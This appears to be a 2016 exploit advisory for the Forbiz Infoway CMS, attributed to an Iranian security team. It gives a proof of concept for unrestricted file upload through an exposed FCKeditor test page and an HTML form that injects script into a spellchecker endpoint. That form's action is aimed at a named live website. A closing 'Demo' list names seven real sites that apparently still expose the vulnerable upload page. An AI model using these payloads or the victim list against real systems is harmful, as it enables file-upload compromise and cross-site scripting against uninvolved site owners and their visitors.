================================================================================
Forbiz Infoway CMS - File Upload / Cross Site Scripting
================================================================================
# Vendor Homepage: http://www.forbiz.co.in/
# Date: 07/10/2016
# Author: Ashiyane Digital Security Team
# Verion: All
================================================================================
# PoC of File Upload (FCKeditor):
Vulnerable page : 
http://localhost/cms/editor/filemanager/connectors/uploadtest.html
Path of file : http://localhost/images/fck_editor_images/file.txt


# PoC of Xss :
<html>
<form 
action="http://chakraayurvedicresort.com/cms/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" 
method="post">
     <input type="hidden" 
name="textinputs[1</script><script>alert(123);//</script>]" value="test">
     <input type="submit" value="xss">
</form>

# Demo :
http://www.chakraayurvedicresort.com/cms/editor/filemanager/connectors/uploadtest.html
http://www.seshansacademy.com/cms/editor/filemanager/connectors/uploadtest.html
http://aiim.net.in/cms/editor/filemanager/connectors/uploadtest.html
http://www.swiftport.net/cms/editor/filemanager/connectors/uploadtest.html
http://www.hrdcnainital.ac.in/cms/editor/filemanager/connectors/uploadtest.html
http://www.svgmindia.com/cms/editor/filemanager/connectors/uploadtest.html
http://www.attukalshoppingcomplex.com/cms/editor/filemanager/connectors/uploadtest.html 

================================================================================
# Discovered By : M.R.S.L.Y
================================================================================